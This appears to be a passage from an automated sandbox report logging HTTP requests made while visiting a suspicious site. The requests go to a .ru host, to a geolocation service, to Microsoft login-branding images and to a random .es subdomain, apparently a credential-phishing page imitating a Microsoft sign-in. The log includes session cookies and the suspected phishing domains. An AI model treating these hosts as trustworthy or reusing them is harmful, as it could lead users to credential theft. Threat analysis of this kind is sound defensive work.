                Source: global trafficHTTP traffic detected: GET /wx1tT22QUEgCZaGjn5nvopa9nekPTk1HUOZXab180 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ikk4Z3BuMDd1OWlGeS9EWGpSRVZZTnc9PSIsInZhbHVlIjoiUlF6cjBULzB1cE9jSk1YZGl5RVlpcEtBMmlrcllERWZDaWRkKzJ1b3pScEFpSHE4Wk94akdYZ3FrYlltT01tWWhreHFHeGJ0bXJodlozKzU4YkswbDRLMnhCaGNZbXFZRmp4SDhpa3BUZTZUYUFDczZiUnhZZHJiRmkxRFNpMDciLCJtYWMiOiJiZmVlZWQ3ZGNhMmFiZDY3YWE1MjMwMDZjYWU3YWNhZDk2NTgzMDBlODVmYjIxNDMxMDFhNGQ1OTk5ZDA2YzZjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik9yZUZQOXh5eDFUdWw4UmkzYlZHU0E9PSIsInZhbHVlIjoiazlWemhCOFRmMWdGMkFYMXpuSHFQdXVCODE3SGNvdkdQTGFTQmY5Wk5YZGNTSDBFakkvdVlkK3B1enp2MHVhUm9qQ1hwOHFqWmE1VUlWamxBVmhkclNld1VRallYNzdKOGl5ZVN1dE5zM1BqMDRIZjhLRWJsdG9RVHJMNWprZFIiLCJtYWMiOiIyOTRiOWJlYjBmODNkMWFiZTVhYmQ5ZGE5YWIzNWQyZGM5NGM0YTc4MmJjZjk3NWMyYzM4YjE5YjBiMjM4YWVlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /opLSiaB9ByXzXiMLXkUtTDVNvC5uvO3K5VoVfvy4h6Q4hC6ljuJ8SswDsKef195 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ikk4Z3BuMDd1OWlGeS9EWGpSRVZZTnc9PSIsInZhbHVlIjoiUlF6cjBULzB1cE9jSk1YZGl5RVlpcEtBMmlrcllERWZDaWRkKzJ1b3pScEFpSHE4Wk94akdYZ3FrYlltT01tWWhreHFHeGJ0bXJodlozKzU4YkswbDRLMnhCaGNZbXFZRmp4SDhpa3BUZTZUYUFDczZiUnhZZHJiRmkxRFNpMDciLCJtYWMiOiJiZmVlZWQ3ZGNhMmFiZDY3YWE1MjMwMDZjYWU3YWNhZDk2NTgzMDBlODVmYjIxNDMxMDFhNGQ1OTk5ZDA2YzZjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik9yZUZQOXh5eDFUdWw4UmkzYlZHU0E9PSIsInZhbHVlIjoiazlWemhCOFRmMWdGMkFYMXpuSHFQdXVCODE3SGNvdkdQTGFTQmY5Wk5YZGNTSDBFakkvdVlkK3B1enp2MHVhUm9qQ1hwOHFqWmE1VUlWamxBVmhkclNld1VRallYNzdKOGl5ZVN1dE5zM1BqMDRIZjhLRWJsdG9RVHJMNWprZFIiLCJtYWMiOiIyOTRiOWJlYjBmODNkMWFiZTVhYmQ5ZGE5YWIzNWQyZGM5NGM0YTc4MmJjZjk3NWMyYzM4YjE5YjBiMjM4YWVlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /ijHv87UWYgy42RuFaqcJLe5KATUkReoJHNxyNcH6nNwnShBAq6J0w1wvwef209 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ikk4Z3BuMDd1OWlGeS9EWGpSRVZZTnc9PSIsInZhbHVlIjoiUlF6cjBULzB1cE9jSk1YZGl5RVlpcEtBMmlrcllERWZDaWRkKzJ1b3pScEFpSHE4Wk94akdYZ3FrYlltT01tWWhreHFHeGJ0bXJodlozKzU4YkswbDRLMnhCaGNZbXFZRmp4SDhpa3BUZTZUYUFDczZiUnhZZHJiRmkxRFNpMDciLCJtYWMiOiJiZmVlZWQ3ZGNhMmFiZDY3YWE1MjMwMDZjYWU3YWNhZDk2NTgzMDBlODVmYjIxNDMxMDFhNGQ1OTk5ZDA2YzZjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik9yZUZQOXh5eDFUdWw4UmkzYlZHU0E9PSIsInZhbHVlIjoiazlWemhCOFRmMWdGMkFYMXpuSHFQdXVCODE3SGNvdkdQTGFTQmY5Wk5YZGNTSDBFakkvdVlkK3B1enp2MHVhUm9qQ1hwOHFqWmE1VUlWamxBVmhkclNld1VRallYNzdKOGl5ZVN1dE5zM1BqMDRIZjhLRWJsdG9RVHJMNWprZFIiLCJtYWMiOiIyOTRiOWJlYjBmODNkMWFiZTVhYmQ5ZGE5YWIzNWQyZGM5NGM0YTc4MmJjZjk3NWMyYzM4YjE5YjBiMjM4YWVlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /qrCGMlrf6UAppLLNdTWauA5MMGs9ipT58Q7xPSLq9Qtes84yIOstapY0rISWX25MuEeeyMuJRL2TOlgxItFUUcd240 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ikk4Z3BuMDd1OWlGeS9EWGpSRVZZTnc9PSIsInZhbHVlIjoiUlF6cjBULzB1cE9jSk1YZGl5RVlpcEtBMmlrcllERWZDaWRkKzJ1b3pScEFpSHE4Wk94akdYZ3FrYlltT01tWWhreHFHeGJ0bXJodlozKzU4YkswbDRLMnhCaGNZbXFZRmp4SDhpa3BUZTZUYUFDczZiUnhZZHJiRmkxRFNpMDciLCJtYWMiOiJiZmVlZWQ3ZGNhMmFiZDY3YWE1MjMwMDZjYWU3YWNhZDk2NTgzMDBlODVmYjIxNDMxMDFhNGQ1OTk5ZDA2YzZjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik9yZUZQOXh5eDFUdWw4UmkzYlZHU0E9PSIsInZhbHVlIjoiazlWemhCOFRmMWdGMkFYMXpuSHFQdXVCODE3SGNvdkdQTGFTQmY5Wk5YZGNTSDBFakkvdVlkK3B1enp2MHVhUm9qQ1hwOHFqWmE1VUlWamxBVmhkclNld1VRallYNzdKOGl5ZVN1dE5zM1BqMDRIZjhLRWJsdG9RVHJMNWprZFIiLCJtYWMiOiIyOTRiOWJlYjBmODNkMWFiZTVhYmQ5ZGE5YWIzNWQyZGM5NGM0YTc4MmJjZjk3NWMyYzM4YjE5YjBiMjM4YWVlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /efK2FIvDz4exzwBMGuiQzijGRS9SC3l3iixUgqu1a78150 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ikk4Z3BuMDd1OWlGeS9EWGpSRVZZTnc9PSIsInZhbHVlIjoiUlF6cjBULzB1cE9jSk1YZGl5RVlpcEtBMmlrcllERWZDaWRkKzJ1b3pScEFpSHE4Wk94akdYZ3FrYlltT01tWWhreHFHeGJ0bXJodlozKzU4YkswbDRLMnhCaGNZbXFZRmp4SDhpa3BUZTZUYUFDczZiUnhZZHJiRmkxRFNpMDciLCJtYWMiOiJiZmVlZWQ3ZGNhMmFiZDY3YWE1MjMwMDZjYWU3YWNhZDk2NTgzMDBlODVmYjIxNDMxMDFhNGQ1OTk5ZDA2YzZjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik9yZUZQOXh5eDFUdWw4UmkzYlZHU0E9PSIsInZhbHVlIjoiazlWemhCOFRmMWdGMkFYMXpuSHFQdXVCODE3SGNvdkdQTGFTQmY5Wk5YZGNTSDBFakkvdVlkK3B1enp2MHVhUm9qQ1hwOHFqWmE1VUlWamxBVmhkclNld1VRallYNzdKOGl5ZVN1dE5zM1BqMDRIZjhLRWJsdG9RVHJMNWprZFIiLCJtYWMiOiIyOTRiOWJlYjBmODNkMWFiZTVhYmQ5ZGE5YWIzNWQyZGM5NGM0YTc4MmJjZjk3NWMyYzM4YjE5YjBiMjM4YWVlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /ijxklk3o1uVrqMrRUBGmWAprfMcMwxTiET7gzJd6S83STchwGwZuL1156169 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ikk4Z3BuMDd1OWlGeS9EWGpSRVZZTnc9PSIsInZhbHVlIjoiUlF6cjBULzB1cE9jSk1YZGl5RVlpcEtBMmlrcllERWZDaWRkKzJ1b3pScEFpSHE4Wk94akdYZ3FrYlltT01tWWhreHFHeGJ0bXJodlozKzU4YkswbDRLMnhCaGNZbXFZRmp4SDhpa3BUZTZUYUFDczZiUnhZZHJiRmkxRFNpMDciLCJtYWMiOiJiZmVlZWQ3ZGNhMmFiZDY3YWE1MjMwMDZjYWU3YWNhZDk2NTgzMDBlODVmYjIxNDMxMDFhNGQ1OTk5ZDA2YzZjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik9yZUZQOXh5eDFUdWw4UmkzYlZHU0E9PSIsInZhbHVlIjoiazlWemhCOFRmMWdGMkFYMXpuSHFQdXVCODE3SGNvdkdQTGFTQmY5Wk5YZGNTSDBFakkvdVlkK3B1enp2MHVhUm9qQ1hwOHFqWmE1VUlWamxBVmhkclNld1VRallYNzdKOGl5ZVN1dE5zM1BqMDRIZjhLRWJsdG9RVHJMNWprZFIiLCJtYWMiOiIyOTRiOWJlYjBmODNkMWFiZTVhYmQ5ZGE5YWIzNWQyZGM5NGM0YTc4MmJjZjk3NWMyYzM4YjE5YjBiMjM4YWVlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /stzUMfCJwsYYQSZDUiXPk9wCLE451Cteu0znmX3rYqpg9R7UWp9NlPjgh260 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ikk4Z3BuMDd1OWlGeS9EWGpSRVZZTnc9PSIsInZhbHVlIjoiUlF6cjBULzB1cE9jSk1YZGl5RVlpcEtBMmlrcllERWZDaWRkKzJ1b3pScEFpSHE4Wk94akdYZ3FrYlltT01tWWhreHFHeGJ0bXJodlozKzU4YkswbDRLMnhCaGNZbXFZRmp4SDhpa3BUZTZUYUFDczZiUnhZZHJiRmkxRFNpMDciLCJtYWMiOiJiZmVlZWQ3ZGNhMmFiZDY3YWE1MjMwMDZjYWU3YWNhZDk2NTgzMDBlODVmYjIxNDMxMDFhNGQ1OTk5ZDA2YzZjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik9yZUZQOXh5eDFUdWw4UmkzYlZHU0E9PSIsInZhbHVlIjoiazlWemhCOFRmMWdGMkFYMXpuSHFQdXVCODE3SGNvdkdQTGFTQmY5Wk5YZGNTSDBFakkvdVlkK3B1enp2MHVhUm9qQ1hwOHFqWmE1VUlWamxBVmhkclNld1VRallYNzdKOGl5ZVN1dE5zM1BqMDRIZjhLRWJsdG9RVHJMNWprZFIiLCJtYWMiOiIyOTRiOWJlYjBmODNkMWFiZTVhYmQ5ZGE5YWIzNWQyZGM5NGM0YTc4MmJjZjk3NWMyYzM4YjE5YjBiMjM4YWVlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /opLSiaB9ByXzXiMLXkUtTDVNvC5uvO3K5VoVfvy4h6Q4hC6ljuJ8SswDsKef195 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ikk4Z3BuMDd1OWlGeS9EWGpSRVZZTnc9PSIsInZhbHVlIjoiUlF6cjBULzB1cE9jSk1YZGl5RVlpcEtBMmlrcllERWZDaWRkKzJ1b3pScEFpSHE4Wk94akdYZ3FrYlltT01tWWhreHFHeGJ0bXJodlozKzU4YkswbDRLMnhCaGNZbXFZRmp4SDhpa3BUZTZUYUFDczZiUnhZZHJiRmkxRFNpMDciLCJtYWMiOiJiZmVlZWQ3ZGNhMmFiZDY3YWE1MjMwMDZjYWU3YWNhZDk2NTgzMDBlODVmYjIxNDMxMDFhNGQ1OTk5ZDA2YzZjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik9yZUZQOXh5eDFUdWw4UmkzYlZHU0E9PSIsInZhbHVlIjoiazlWemhCOFRmMWdGMkFYMXpuSHFQdXVCODE3SGNvdkdQTGFTQmY5Wk5YZGNTSDBFakkvdVlkK3B1enp2MHVhUm9qQ1hwOHFqWmE1VUlWamxBVmhkclNld1VRallYNzdKOGl5ZVN1dE5zM1BqMDRIZjhLRWJsdG9RVHJMNWprZFIiLCJtYWMiOiIyOTRiOWJlYjBmODNkMWFiZTVhYmQ5ZGE5YWIzNWQyZGM5NGM0YTc4MmJjZjk3NWMyYzM4YjE5YjBiMjM4YWVlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /wx1tT22QUEgCZaGjn5nvopa9nekPTk1HUOZXab180 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ikk4Z3BuMDd1OWlGeS9EWGpSRVZZTnc9PSIsInZhbHVlIjoiUlF6cjBULzB1cE9jSk1YZGl5RVlpcEtBMmlrcllERWZDaWRkKzJ1b3pScEFpSHE4Wk94akdYZ3FrYlltT01tWWhreHFHeGJ0bXJodlozKzU4YkswbDRLMnhCaGNZbXFZRmp4SDhpa3BUZTZUYUFDczZiUnhZZHJiRmkxRFNpMDciLCJtYWMiOiJiZmVlZWQ3ZGNhMmFiZDY3YWE1MjMwMDZjYWU3YWNhZDk2NTgzMDBlODVmYjIxNDMxMDFhNGQ1OTk5ZDA2YzZjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik9yZUZQOXh5eDFUdWw4UmkzYlZHU0E9PSIsInZhbHVlIjoiazlWemhCOFRmMWdGMkFYMXpuSHFQdXVCODE3SGNvdkdQTGFTQmY5Wk5YZGNTSDBFakkvdVlkK3B1enp2MHVhUm9qQ1hwOHFqWmE1VUlWamxBVmhkclNld1VRallYNzdKOGl5ZVN1dE5zM1BqMDRIZjhLRWJsdG9RVHJMNWprZFIiLCJtYWMiOiIyOTRiOWJlYjBmODNkMWFiZTVhYmQ5ZGE5YWIzNWQyZGM5NGM0YTc4MmJjZjk3NWMyYzM4YjE5YjBiMjM4YWVlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /qrCGMlrf6UAppLLNdTWauA5MMGs9ipT58Q7xPSLq9Qtes84yIOstapY0rISWX25MuEeeyMuJRL2TOlgxItFUUcd240 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ikk4Z3BuMDd1OWlGeS9EWGpSRVZZTnc9PSIsInZhbHVlIjoiUlF6cjBULzB1cE9jSk1YZGl5RVlpcEtBMmlrcllERWZDaWRkKzJ1b3pScEFpSHE4Wk94akdYZ3FrYlltT01tWWhreHFHeGJ0bXJodlozKzU4YkswbDRLMnhCaGNZbXFZRmp4SDhpa3BUZTZUYUFDczZiUnhZZHJiRmkxRFNpMDciLCJtYWMiOiJiZmVlZWQ3ZGNhMmFiZDY3YWE1MjMwMDZjYWU3YWNhZDk2NTgzMDBlODVmYjIxNDMxMDFhNGQ1OTk5ZDA2YzZjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik9yZUZQOXh5eDFUdWw4UmkzYlZHU0E9PSIsInZhbHVlIjoiazlWemhCOFRmMWdGMkFYMXpuSHFQdXVCODE3SGNvdkdQTGFTQmY5Wk5YZGNTSDBFakkvdVlkK3B1enp2MHVhUm9qQ1hwOHFqWmE1VUlWamxBVmhkclNld1VRallYNzdKOGl5ZVN1dE5zM1BqMDRIZjhLRWJsdG9RVHJMNWprZFIiLCJtYWMiOiIyOTRiOWJlYjBmODNkMWFiZTVhYmQ5ZGE5YWIzNWQyZGM5NGM0YTc4MmJjZjk3NWMyYzM4YjE5YjBiMjM4YWVlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /ijHv87UWYgy42RuFaqcJLe5KATUkReoJHNxyNcH6nNwnShBAq6J0w1wvwef209 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ikk4Z3BuMDd1OWlGeS9EWGpSRVZZTnc9PSIsInZhbHVlIjoiUlF6cjBULzB1cE9jSk1YZGl5RVlpcEtBMmlrcllERWZDaWRkKzJ1b3pScEFpSHE4Wk94akdYZ3FrYlltT01tWWhreHFHeGJ0bXJodlozKzU4YkswbDRLMnhCaGNZbXFZRmp4SDhpa3BUZTZUYUFDczZiUnhZZHJiRmkxRFNpMDciLCJtYWMiOiJiZmVlZWQ3ZGNhMmFiZDY3YWE1MjMwMDZjYWU3YWNhZDk2NTgzMDBlODVmYjIxNDMxMDFhNGQ1OTk5ZDA2YzZjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik9yZUZQOXh5eDFUdWw4UmkzYlZHU0E9PSIsInZhbHVlIjoiazlWemhCOFRmMWdGMkFYMXpuSHFQdXVCODE3SGNvdkdQTGFTQmY5Wk5YZGNTSDBFakkvdVlkK3B1enp2MHVhUm9qQ1hwOHFqWmE1VUlWamxBVmhkclNld1VRallYNzdKOGl5ZVN1dE5zM1BqMDRIZjhLRWJsdG9RVHJMNWprZFIiLCJtYWMiOiIyOTRiOWJlYjBmODNkMWFiZTVhYmQ5ZGE5YWIzNWQyZGM5NGM0YTc4MmJjZjk3NWMyYzM4YjE5YjBiMjM4YWVlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /stzUMfCJwsYYQSZDUiXPk9wCLE451Cteu0znmX3rYqpg9R7UWp9NlPjgh260 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ikk4Z3BuMDd1OWlGeS9EWGpSRVZZTnc9PSIsInZhbHVlIjoiUlF6cjBULzB1cE9jSk1YZGl5RVlpcEtBMmlrcllERWZDaWRkKzJ1b3pScEFpSHE4Wk94akdYZ3FrYlltT01tWWhreHFHeGJ0bXJodlozKzU4YkswbDRLMnhCaGNZbXFZRmp4SDhpa3BUZTZUYUFDczZiUnhZZHJiRmkxRFNpMDciLCJtYWMiOiJiZmVlZWQ3ZGNhMmFiZDY3YWE1MjMwMDZjYWU3YWNhZDk2NTgzMDBlODVmYjIxNDMxMDFhNGQ1OTk5ZDA2YzZjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik9yZUZQOXh5eDFUdWw4UmkzYlZHU0E9PSIsInZhbHVlIjoiazlWemhCOFRmMWdGMkFYMXpuSHFQdXVCODE3SGNvdkdQTGFTQmY5Wk5YZGNTSDBFakkvdVlkK3B1enp2MHVhUm9qQ1hwOHFqWmE1VUlWamxBVmhkclNld1VRallYNzdKOGl5ZVN1dE5zM1BqMDRIZjhLRWJsdG9RVHJMNWprZFIiLCJtYWMiOiIyOTRiOWJlYjBmODNkMWFiZTVhYmQ5ZGE5YWIzNWQyZGM5NGM0YTc4MmJjZjk3NWMyYzM4YjE5YjBiMjM4YWVlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://jx7d.qdjcpol.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://jx7d.qdjcpol.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /c1c6b6c8-5kvzmnbiwnxveuugfi6pfkasym43gvzae849badagts/logintenantbranding/0/illustration?ts=637580027298952703 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://jx7d.qdjcpol.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /c1c6b6c8-5kvzmnbiwnxveuugfi6pfkasym43gvzae849badagts/logintenantbranding/0/bannerlogo?ts=637580033998959238 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://jx7d.qdjcpol.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /566903420842701463366367vvZrDRCudQFGGZXQBWROEIZCCKNRGZFUSHNRCWJDMHQPDVHSSOLOPVEBHXHYLQrsOggfteaZTCkGyBSlnA12y2Duv40 HTTP/1.1Host: xd0blkqxjnyla9ewor4shw8juc2a0v3y2amqpz6jwi7hqrupfl.idrisxw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /c1c6b6c8-5kvzmnbiwnxveuugfi6pfkasym43gvzae849badagts/logintenantbranding/0/bannerlogo?ts=637580033998959238 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
